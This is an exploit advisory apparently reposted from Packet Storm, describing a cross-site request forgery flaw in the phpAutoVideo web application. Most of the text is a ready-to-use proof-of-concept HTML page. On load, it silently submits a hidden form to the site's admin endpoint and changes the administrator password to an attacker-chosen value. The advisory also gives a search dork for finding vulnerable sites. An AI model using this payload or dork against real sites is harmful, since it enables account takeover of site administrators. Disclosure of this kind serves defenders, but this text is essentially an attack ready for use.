phpAutoVideo Cross Site Request Forgery

2010-02-20T00:00:00
ID PACKETSTORM:86484
Type packetstorm
Reporter GoLdeN-z3r0
Modified 2010-02-20T00:00:00

Description

                                        
                                            `  
  
##################################################################  
#Exploit Title: phpAutoVideo csrf #  
#Date: 19/3/2010 #  
#SoftWare:https://secure.agaresmedia.com/v6/products/phpautovideo#  
#Dork: Copyright Agares Media phpautovideo #  
#Author: GoLdeN-z3r0 #  
##################################################################  
(-----------------------------------------------------------------)  
| PoC : |  
(-----------------------------------------------------------------)  
<html>  
<body onload="document.registrationform.submit()">  
<form action="http://[site]/admin/coreadmin.php" method="post" name="registrationform">  
<input type="hidden" name="admintype" value="changepass">  
<input type="hidden" name="passworda" value="z3r0">  
<input type="hidden" name="passwordb" value="z3r0">  
</form>  
</body>  
</html>  
  
________________________________  
Hotmail: Powerful Free email with security by Microsoft. Get it now.<https://signup.live.com/signup.aspx?id=60969>  
  
  
  
`